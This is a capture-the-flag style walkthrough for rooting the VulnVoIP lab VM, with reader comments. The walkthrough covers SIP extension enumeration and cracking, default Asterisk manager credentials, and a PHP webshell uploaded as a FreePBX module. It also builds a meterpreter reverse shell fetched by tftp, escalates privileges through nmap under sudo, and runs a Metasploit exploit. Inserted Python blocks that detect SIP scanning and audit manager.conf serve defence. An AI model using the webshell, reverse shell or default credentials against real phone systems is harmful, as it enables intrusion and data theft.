As promised here we shall discuss a couple of ways to get root on VulnVoIP with some enumeration ‘fun’ in-between!
Assuming you’ve located the IP address, you can run a port scan and will find the following services listening (shortened for easy reference):
- 22/tcp open
- 53/tcp open domain
- 80/tcp open http
- 111/tcp open rpcbind
- 967/tcp open
- 3306/tcp open mysql
- 4445/tcp open
- 5038/tcp open asterisk
VoIP User Enumeration
In this demonstration I’m using SIPVicious to enumerate the SIP device/users and to help crack extension passwords.
The first thing to do is enumerate the end device. To do so we can use the command ./svmap.py --fingerprint 192.168.237.148
The next step is to locate valid SIP extensions. The initial command I used was ./svwar.py -D 192.168.237.148
As you can see no valid extensions are returned.
It’s possible to specify the method used in the request. In this particular instance the INVITE request brings back valid responses: ./svwar.py -D -m INVITE 192.168.237.148
If all went well you should find that 6 extensions exist. The -D option used in the previous command just searches for default extensions, so it’s generally best to use a custom range. I also found that if I specified the extensions to scan, i.e. -e100-3000, only the lower extensions were found, hence it may be best to split up long scans.
Now that we’ve located extensions we really want to crack the associated passwords. Again SIPVicious can be used to perform this attack by using a command such as ./svcrack.py -u2000 -d passwords.txt 192.168.237.148
You might find that some extensions are easy to crack, others are a bit more testing! In this particular case, luckily, we have another unusual method of obtaining extension passwords.
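From the defender's side, the svwar sweep and the svcrack guessing described above both leave a recognisable pattern in SIP traffic. The following is an added example, not part of the original post: it assumes requests are available as (source IP, raw SIP text) pairs, the sample traffic is constructed, and the thresholds are arbitrary starting points. It relies on SIPVicious sending the User-Agent friendly-scanner by default.

```python
import re
from collections import defaultdict

TO_USER = re.compile(r"^To:.*?<sip:([^@>]+)@", re.I | re.M)
USER_AGENT = re.compile(r"^User-Agent:\s*(.+?)\s*$", re.I | re.M)
HAS_AUTH = re.compile(r"^Authorization:", re.I | re.M)

def sip(method, ext, agent, auth=False):
    """Build a minimal SIP request for the constructed sample below."""
    msg = (f"{method} sip:{ext}@192.0.2.10 SIP/2.0\r\n"
           f"To: <sip:{ext}@192.0.2.10>\r\nUser-Agent: {agent}\r\n")
    if auth:
        msg += f'Authorization: Digest username="{ext}", realm="asterisk"\r\n'
    return msg + "\r\n"

# Constructed (source IP, request) pairs: a sweep plus guessing from one host,
# and an ordinary softphone registration from another.
SAMPLE = (
    [("198.51.100.7", sip("INVITE", e, "friendly-scanner")) for e in range(100, 110)]
    + [("198.51.100.7", sip("REGISTER", 2000, "friendly-scanner", auth=True))] * 8
    + [("192.0.2.50", sip("REGISTER", 2001, "X-Lite", auth=True))] * 2
)

def analyze(messages, sweep_min=5, guess_min=5):
    """Return {source IP: [findings]} for sweep, guessing and scanner-UA heuristics."""
    targets, guesses, scanner = defaultdict(set), defaultdict(int), set()
    for src, raw in messages:
        to = TO_USER.search(raw)
        if not to:
            continue
        targets[src].add(to.group(1))
        if HAS_AUTH.search(raw):          # request carrying a digest response
            guesses[(src, to.group(1))] += 1
        agent = USER_AGENT.search(raw)
        if agent and "friendly-scanner" in agent.group(1).lower():
            scanner.add(src)
    findings = defaultdict(list)
    for src, exts in targets.items():
        if len(exts) >= sweep_min:
            findings[src].append(f"extension sweep: {len(exts)} distinct targets")
    for (src, ext), count in guesses.items():
        if count >= guess_min:
            findings[src].append(f"credential guessing against {ext}: {count} attempts")
    for src in scanner:
        findings[src].append("SIPVicious default User-Agent")
    return dict(findings)
```

The User-Agent match is the weakest of the three signals because the client chooses that header; the per-source counts still apply when it is changed.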
Referring back to the port scan you can see that TCP port 5038 (Asterisk Call Manager) is open and available to external probes! If you performed a vulnerability scan this may have shown up stating that default credentials are in place.
It is possible to connect to the service using the telnet protocol on port 5038 with the default username admin and password amp111.
Using the command action with the actual command of sip show users it is possible to pull out a complete list of users, shown below:
The acm interface can also be used to locate voicemail users (useful for the next exercise!)
Note the ‘interesting’ information highlighted in the above image.
A thorough list of acm commands can be found here
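The exposure above comes down to three settings in Asterisk's manager.conf: a listener reachable from outside, the default secret, and an account allowed to run CLI commands. The audit below is an added example, not part of the original post and not FreePBX's own tooling; both configuration files are constructed, and the default-secret list holds only the value named in this write-up.

```python
import ipaddress
# Constructed manager.conf files (not taken from the VM): weak, then tightened.
WEAK = """[general]
enabled = yes
bindaddr = 0.0.0.0
[admin]
secret = amp111            ; default credential named in the write-up
write = system,call,command
"""
HARDENED = """[general]
enabled = yes
bindaddr = 127.0.0.1
[admin]
secret = constructed-long-random-value
deny = 0.0.0.0/0.0.0.0
permit = 127.0.0.1/255.255.255.255
write = system,call
"""
DEFAULT_SECRETS = {"amp111"}   # extend with other defaults you track

def parse(text):
    """Parse Asterisk-style INI into {section: {key: [values]}}; keys may repeat."""
    conf, section = {}, None
    for line in text.splitlines():
        line = line.split(";", 1)[0].strip()          # ';' starts a comment
        if line.startswith("[") and "]" in line:
            section = conf.setdefault(line[1:line.index("]")], {})
        elif "=" in line and section is not None:
            key, value = line.split("=", 1)
            section.setdefault(key.strip().lower(), []).append(value.strip())
    return conf

def audit(text):
    conf, findings = parse(text), []
    general = conf.pop("general", {})
    if general.get("enabled", ["no"])[-1].lower() != "yes":
        return findings                               # AMI is off
    bind = general.get("bindaddr", ["0.0.0.0"])[-1]   # assumed default: all interfaces
    if not ipaddress.ip_address(bind).is_loopback:
        findings.append(f"general: AMI bound to {bind}, not loopback")
    for user, opts in conf.items():
        if set(opts.get("secret", [])) & DEFAULT_SECRETS:
            findings.append(f"{user}: default secret")
        if not opts.get("permit"):
            findings.append(f"{user}: no permit ACL")
        classes = {c.strip() for v in opts.get("write", []) for c in v.lower().split(",")}
        if "command" in classes:
            findings.append(f"{user}: write class 'command' enabled")
    return findings
```

Calling audit(WEAK) reports all four problems, while audit(HARDENED) returns an empty list.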
Further Exploitation
As we’ve located a single user with voicemail capability, and we have the extension password, it is possible to use a soft-phone to log in with the credentials and attempt to gain access to the user’s voicemail inbox. For this particular example I’m using X-Lite.
Referencing Asterisk documentation it’s possible to see that *97 can be used to obtain voicemail. As we don’t know the voicemail password we’re going to have to bruteforce the manual way! Hint: 0000 may get you in… In case you’re still struggling the voicemail goes along the lines of the following:
‘…Hey Mark, I think the support web access account has been compromised. I have changed the password to securesupport123 all one word and lowercase. You can log on at the usual address. See you in the morning…’
After listening to the voicemail you should now have the username and password for the support account. To test these out navigate to the HTTP interface and enter the credentials support/securesupport123
Upon login you’ll be presented with the main administrative interface. A key piece of info is found in the FreePBX version details (research for vulnerabilities).
One particular vulnerability of interest can be found here, of which an extract follows:
- Create a directory such as: webshell
- Create a PHP file webshell, i.e. webshell.php
- Example.: <? if($_GET['cmd']) { system($_GET['cmd']); }?>
- Put this file into the webshell directory and create a tarball.
- This compressed file name needs to follow the given rule, i.e. name-version.tgz.
- The following command can be used to compress: tar -czvf webshell-1.0.tgz webshell/.
- Upload via the FreePBX modules interface
Using the webshell to perform a basic command (to ensure all is working as expected).
I used msfpayload to create a reverse shell for ease of access.
msfpayload linux/x86/meterpreter/reverse_tcp LHOST=192.168.237.129 LPORT=4448 X > /root/vulnvoip/rev_shell.
The handler (exploit/multi/handler) was used to listen and wait for incoming connections.
TFTP can be used to upload the binary to the host using the PHP webshell as previously created, by using the command tftp *HOST_IP* -c get rev_shell.
Permissions of the uploaded file will need to be altered, i.e. chmod 777 rev_shell – not a great idea to use lax permissions like these in real life 😉
Upon gaining access via the Meterpreter shell it makes things easier (continue reading)…
Local Privilege Escalation
The usual tips and tricks work here. A little surprise is hidden in the sudoers file. Firstly we’ll need to locate the current user by issuing the command id which will show the user is asterisk. Issuing the command sudo -l will then identify the commands that asterisk can run as root.
The user asterisk can surprisingly run nmap as root! There’s a little trick here…
We’ve got root!
Exploitation – The Easy Way!
The following was covered in detail by Offensive Security and the write-up can be found here.
The version of FreePBX in use is vulnerable to an arbitrary remote code execution issue. Further details can be found at exploitDB and Securityfocus.
From the reported details it is possible to see that a Metasploit module exists, this being exploit/unix/http/freepbx_callmenum.
Set the relevant options (note, the extension we use for this either has to go to voicemail or the call needs to be answered). For this exploit we’re going to use the support extension. We’ll assume that we haven’t yet cracked user credentials to any extensions and, this being the only one with voicemail, leaves us with just one choice.
Exploit!
We have root shell. Now how cool and easy was that!
There are a few more funky things we can do with VulnVoIP, such as SIP spoofing. However we’ll cover that in a separate post and in the meantime have some fun!
something new for freepbx asterisk trixbox??
seems the web page for voicemail access is not working with the 2000 account, that’s why you used x-lite ?
Thanks for this – really enjoyed it!
Every time I try to log in using telnet to port 5038 I see Call Manager, but then any time I type anything I receive “Response Error” and “Message missing action in request”. I have tried SSH but don’t know the actual login name.
I am using backtrack 5 r3
root@BT# telnet 10.10.10.111 5037
Then the errors.
I even re-downloaded and installed into VMware Workstation 9. Any idea??
Thanks
root@bt:~# telnet 10.10.10.111 5038
Trying 10.10.10.111…
Connected to 10.10.10.111.
Escape character is ‘^]’.
Asterisk Call Manager/1.1
Response: Error
Message: Missing action in request
This is my error, the VM is using bridged mode at 10.10.10.111, I am at 10.10.10.109. I can ping it, access it from the web page but cannot log in to the damn thing so I can create and upload the PHP file. Any ideas on this?
Does anyone just know the web-admin login. Then I can continue on. Thanks
Hello Owen
I really need the username and password for when I start the image in VMware, and only you can help me!
Please, so I can try to finish my work with success!!
Very Thanks!!!
Guys, just to reiterate, the root password is not needed/given. The idea of this challenge is to crack the box and gain access. The solutions post should help you achieve this.
After opening the VulnVOIP in VMware, how will I get the IP address of the VulnVOIP machine for scanning with nmap?
Hi
plz what is default password of trixbox and freepbx ?
Hello, there is no port 5038 running on the VulnVoip instance. What gives?
Another way to gain root without any exploit for a FreePBX box, only taking advantage of a bad configuration:
http://blog.pepelux.org/2014/10/29/jugando-con-vulnvoip/
Btw there is a trophy.txt in the root directory.
Reb00tu53r